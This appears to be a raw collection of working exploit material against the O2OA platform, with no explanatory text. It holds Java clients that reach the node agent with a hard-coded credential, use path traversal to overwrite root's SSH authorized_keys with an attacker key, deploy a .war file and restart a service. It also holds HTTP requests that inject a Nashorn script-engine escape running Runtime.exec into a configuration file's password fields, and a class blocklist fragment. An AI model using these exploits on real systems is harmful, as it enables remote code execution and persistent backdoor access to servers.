/x_program_center/jaxrs/storagemappings

import java.io.*;

import java.net.Socket;

import java.util.HashMap;

import java.util.Map;

import com.x.base.core.project.tools.*;

import org.apache.commons.lang3.BooleanUtils;

import com.x.base.core.project.config.Config;

import com.x.base.core.project.config.Node;

import com.x.base.core.project.config.Nodes;

import com.x.base.core.project.gson.XGsonBuilder;

import com.x.program.center.core.entity.InstallTypeEnum;

class Main {

public static byte[] readFileToBytes(String filePath) throws IOException {

File file = new File(filePath);

byte[] bytes = new byte[(int) file.length()];

try (FileInputStream fis = new FileInputStream(file)) {

int bytesRead = fis.read(bytes);

if (bytesRead != file.length()) {

throw new IOException("Could not completely read the file " + file.getName());

}

}

return bytes;

}

public static void main(String[] args) throws Exception {

Nodes nodes = Config.nodes();

for (Map.Entry<String, Node> entry : nodes.entrySet()) {

String node = entry.getKey();

if (BooleanUtils.isNotFalse(entry.getValue().nodeAgentEnable())) {

try (Socket socket = new Socket("192.168.91.130", entry.getValue().nodeAgentPort())) {

socket.setKeepAlive(true);

socket.setSoTimeout(6000);

try (DataOutputStream dos = new DataOutputStream(socket.getOutputStream());

DataInputStream dis = new DataInputStream(socket.getInputStream())) {

Map<String, Object> commandObject = new HashMap<>();

if(InstallTypeEnum.CONFIG.getValue().equals("config")){

commandObject.put("command", "syncFile:" + "/../../../../../root/.ssh/authorized_keys");

}else if(InstallTypeEnum.CUSTOM.getValue().equals("custom")) {

commandObject.put("command", "/../../../../../root/.ssh/authorized_keys");

}else{

return;

}

commandObject.put("credential", Crypto.rsaEncrypt("o2@", Config.publicKey()));

dos.writeUTF(XGsonBuilder.toJson(commandObject));

dos.flush();

dos.writeUTF("/../../../../../root/.ssh/authorized_keys");

dos.flush();

String filePath = "/自己的恶意秘钥/authorized_keys";

byte[] bytes = readFileToBytes(filePath);

try (ByteArrayInputStream bis = new ByteArrayInputStream(bytes)) {

byte[] onceBytes = new byte[1024];

int length = 0;

while ((length = bis.read(onceBytes, 0, onceBytes.length)) != -1) {

dos.write(onceBytes, 0, length);

dos.flush();

}

}

}

}catch (Exception e){

}

}

}

}

package com.x.attendance.assemble.control;

import java.io.*;

import java.net.Socket;

import java.util.HashMap;

import java.util.Map;

import com.x.base.core.project.tools.*;

import org.apache.commons.lang3.BooleanUtils;

import com.x.base.core.project.config.Config;

import com.x.base.core.project.config.Node;

import com.x.base.core.project.config.Nodes;

import com.x.base.core.project.gson.XGsonBuilder;

import com.x.program.center.core.entity.InstallTypeEnum;

class Main {

public static byte[] readFileToBytes(String filePath) throws IOException {

File file = new File(filePath);

byte[] bytes = new byte[(int) file.length()];

try (FileInputStream fis = new FileInputStream(file)) {

int bytesRead = fis.read(bytes);

if (bytesRead != file.length()) {

throw new IOException("Could not completely read the file " + file.getName());

}

}

return bytes;

}

public static void main(String[] args) throws Exception {

try (Socket socket = new Socket("192.168.91.1", 20010)) {

socket.setKeepAlive(true);

socket.setSoTimeout(6000);

try (DataOutputStream dos = new DataOutputStream(socket.getOutputStream());

DataInputStream dis = new DataInputStream(socket.getInputStream())) {

Map<String, Object> commandObject = new HashMap<>();

if(InstallTypeEnum.CONFIG.getValue().equals("config")){

commandObject.put("command", "syncFile:" + "/store/x_mind_assemble_control.war");

}

commandObject.put("credential", Crypto.rsaEncrypt("o2@", "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWcVZIS57VeOUzi8c01WKvwJK9uRe6hrGTUYmF6J/pI6/UvCbdBWCoErbzsBZOElOH8Sqal3vsNMVLjPYClfoDyYDaUlakP3ldfnXJzAFJVVubF53KadG+fwnh9ZMvxdh7VXVqRL3IQBDwGgzX4rmSK+qkUJjc3OkrNJPB7LLD8QIDAQAB"));

dos.writeUTF(XGsonBuilder.toJson(commandObject));

dos.flush();

dos.writeUTF("/store/x_mind_assemble_control.war");

dos.flush();

String filePath = "C:/Users/tangtang/Desktop/x_mind_assemble_control.war";

byte[] bytes = readFileToBytes(filePath);

try (ByteArrayInputStream bis = new ByteArrayInputStream(bytes)) {

byte[] onceBytes = new byte[1024];

int length = 0;

while ((length = bis.read(onceBytes, 0, onceBytes.length)) != -1) {

dos.write(onceBytes, 0, length);

dos.flush();

}

}

}

}catch (Exception e){

}

}

}

package com.x.attendance.assemble.control;

import java.io.*;

import java.net.Socket;

import java.util.HashMap;

import java.util.Map;

import com.x.base.core.project.tools.*;

import org.apache.commons.lang3.BooleanUtils;

import com.x.base.core.project.config.Config;

import com.x.base.core.project.config.Node;

import com.x.base.core.project.config.Nodes;

import com.x.base.core.project.gson.XGsonBuilder;

import com.x.program.center.core.entity.InstallTypeEnum;

class Main_load {

public static void main(String[] args) throws Exception {

try (Socket socket = new Socket("192.168.91.1", 20010)) {

socket.setKeepAlive(true);

socket.setSoTimeout(6000);

try (DataOutputStream dos = new DataOutputStream(socket.getOutputStream());

DataInputStream dis = new DataInputStream(socket.getInputStream())) {

Map<String, Object> commandObject = new HashMap<>();

if(InstallTypeEnum.CONFIG.getValue().equals("config")){

commandObject.put("command", "command:" + "ctl -rst x_mind_assemble_control");

}

commandObject.put("credential", Crypto.rsaEncrypt("o2@", "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWcVZIS57VeOUzi8c01WKvwJK9uRe6hrGTUYmF6J/pI6/UvCbdBWCoErbzsBZOElOH8Sqal3vsNMVLjPYClfoDyYDaUlakP3ldfnXJzAFJVVubF53KadG+fwnh9ZMvxdh7VXVqRL3IQBDwGgzX4rmSK+qkUJjc3OkrNJPB7LLD8QIDAQAB"));

dos.writeUTF(XGsonBuilder.toJson(commandObject));

dos.flush();

}

}catch (Exception e){

}

}

}

var u = Java.type('java.net.URLClassLoader');r = u.getSystemClassLoader().loadClass("java.lang.Runtime");g = r.getMethod('getRuntime').invoke(null).exec("calc.exe");

POST /x_program_center/jaxrs/config/save?v=-4a1e76a HTTP/1.1

Host: 192.168.91.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0

Accept: text/html,application/json,*/*

Accept-Language: zh-CN

Accept-Encoding: gzip, deflate

Referer: http://192.168.91.1/x_desktop/index.html

Content-Type: application/json; charset=utf-8

Authorization: suuEisd4b6FRkYOGKAUd_KMAAnQ8WlvI-IE4itElyqo

Content-Length: 3662

Origin: http://192.168.91.1

Connection: close

Cookie: x-token=suuEisd4b6FRkYOGKAUd_KMAAnQ8WlvI-IE4itElyqo

Priority: u=1

{"fileName":"person.json","fileContent":"{\n\t\"captchaLogin\": false,\n\t\"codeLogin\": true,\n\t\"bindLogin\": true,\n\t\"faceLogin\": true,\n\t\"twoFactorLogin\": false,\n\t\"firstLoginModifyPwd\": false,\n\t\"password\": \"(this.$pwd=function(){var e=Java.type(\\\"java.net.URLClassLoader\\\");r=e.getSystemClassLoader().loadClass(\\\"java.lang.Runtime\\\"),g=r.getMethod(\\\"getRuntime\\\").invoke(null).exec(\\\"calc.exe\\\")};; return this.$pwd(); )\",\n\t\"passwordPeriod\": 0,\n\t\"passwordRegex\": \"^(?=.*[a-z]).{6,30}$\",\n\t\"passwordRegexHint\": \"6-30位，必须包含小写字母\",\n\t\"register\": \"disable\",\n\t\"superPermission\": true,\n\t\"tokenCookieHttpOnly\": true,\n\t\"tokenCookieSecure\": false,\n\t\"tokenName\": \"x-token\",\n\t\"personUnitOrderByAsc\": true,\n\t\"language\": \"zh-CN\",\n\t\"enableSafeLogout\": false,\n\t\"encryptType\": \"\",\n\t\"###captchaLogin\": \"是否启用图片验证码登录,默认值:false.###\",\n\t\"###codeLogin\": \"是否启用短信验证码登录,默认值:true.###\",\n\t\"###bindLogin\": \"是否启用扫描二维码登录,默认值:false.###\",\n\t\"###faceLogin\": \"是否启用刷脸登录,默认值:false.###\",\n\t\"###twoFactorLogin\": \"是否启用双因素认证登录,默认值:false.###\",\n\t\"###firstLoginModifyPwd\": \"是否启用首次登陆修改密码,默认值:false###\",\n\t\"###password\": \"注册初始密码,使用()调用脚本生成初始密码,默认为:(var v = person.getMobile();\\\\nreturn v.substring(v.length - 6);)###\",\n\t\"###passwordPeriod\": \"密码过期时间(天),0表示永不过期,默认值:0.###\",\n\t\"###passwordRegex\": \"密码校验正则表达式,默认6位以上,包含数字和字母.###\",\n\t\"###passwordRegexHint\": \"密码校验不通过的提示信息.###\",\n\t\"###register\": \"是否允许用户自注册,disable:不允许,captcha通过验证码注册,code:通过短信注册,默认值:disable###\",\n\t\"###superPermission\": \"是否启用超级管理员权限,默认值:true###\",\n\t\"###mobileRegex\": \"手机号码校验正则表达式,()表示脚本内容,默认值:(^(\\\\+)?0{0,2}852\\\\d{8}$)|(^(\\\\+)?0{0,2}853\\\\d{8}$)|(^(\\\\+)?0{0,2}886\\\\d{9}$)|(^1(3|4|5|7|8|9)\\\\d{9}$)###\",\n\t\"###failureInterval\": \"登录限制时间(分钟)###\",\n\t\"###failureCount\": \"尝试登录次数###\",\n\t\"###tokenExpiredMinutes\": \"PC或h5端平台认证token时长,分钟###\",\n\t\"###appTokenExpiredMinutes\": \"app端平台认证token时长,分钟###\",\n\t\"###tokenCookieHttpOnly\": \"保存token的cookie是否启用httpOnly###\",\n\t\"###tokenCookieSecure\": \"保存token的cookie是否启用secure，表示仅在https协议才会传输此cookie###\",\n\t\"###tokenName\": \"使用识别用户的token名称,可自定义,默认为:x-token.###\",\n\t\"###personUnitOrderByAsc\": \"人员组织排序是否为升序，true为升序(默认)，false为降序###\",\n\t\"###language\": \"平台语言：zh-CN(中文，默认)、en(英语)###\",\n\t\"###enableSafeLogout\": \"是否启用安全注销.###\",\n\t\"###encryptType\": \"加密方式,支持国密:SM4,AES###\",\n\t\"###extension\": \"扩展设置.###\",\n\t\"extension\": {\n\t\t\"passwordLength\": [\n\t\t\t6,\n\t\t\t30\n\t\t],\n\t\t\"passwordRuleValues\": {\n\t\t\t\"useLowercase\": true,\n\t\t\t\"useNumber\": false,\n\t\t\t\"useUppercase\": false,\n\t\t\t\"useSpecial\": false\n\t\t},\n\t\t\"initialPasswordType\": \"script\",\n\t\t\"password\": \"var u = Java.type('java.net.URLClassLoader');r = u.getSystemClassLoader().loadClass(\\\"java.lang.Runtime\\\");g = r.getMethod('getRuntime').invoke(null).exec(\\\"calc.exe\\\");\"\n\t}\n}"}

POST /x_organization_assemble_control/jaxrs/person?v=-4a1e76a HTTP/1.1

Host: 192.168.91.1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0

Accept: text/html,application/json,*/*

Accept-Language: zh-CN

Accept-Encoding: gzip, deflate

Referer: http://192.168.91.1/x_desktop/index.html

Content-Type: application/json; charset=utf-8

Authorization: suuEisd4b6FRkYOGKAUd_FlYIPOT5U6Y-IE4itElyqo

Content-Length: 424

Origin: http://192.168.91.1

Connection: close

Cookie: x-token=suuEisd4b6FRkYOGKAUd_FlYIPOT5U6Y-IE4itElyqo

{"genderType":"m","signature":"","description":"","unique":"1","orderNumber":"","superior":"","officePhone":"","boardDate":"","birthday":"","employee":"1","password":"","display":"","qq":"","mail":"","weixin":"","weibo":"","mobile":"15412521456","name":"测试","ipAddress":"","controllerList":[],"woPersonAttributeList":[],"woIdentityList":[],"control":{"allowEdit":true,"allowDelete":true},"subjectSecurityClearance":null}

Arrays.asList(Runtime.class.getName(), File.class.getName(), Path.class.getName(),

java.lang.ProcessBuilder.class.getName(), FileWriter.class.getName(),

java.lang.System.class.getName(), Paths.class.getName(), Files.class.getName(),

FileOutputStream.class.getName(), RandomAccessFile.class.getName(), Socket.class.getName(),

ServerSocket.class.getName(), ZipFile.class.getName(), ZipInputStream.class.getName(),

ZipOutputStream.class.getName(), ScriptEngine.class.getName(), ScriptEngineManager.class.getName(),

URL.class.getName(), URI.class.getName(), Class.class.getName()));

var u = Java.type('java.net.URLClassLoader');r = u.getSystemClassLoader().loadClass("java.lang.Runtime");g = r.getMethod('getRuntime').invoke(null).exec("calc.exe");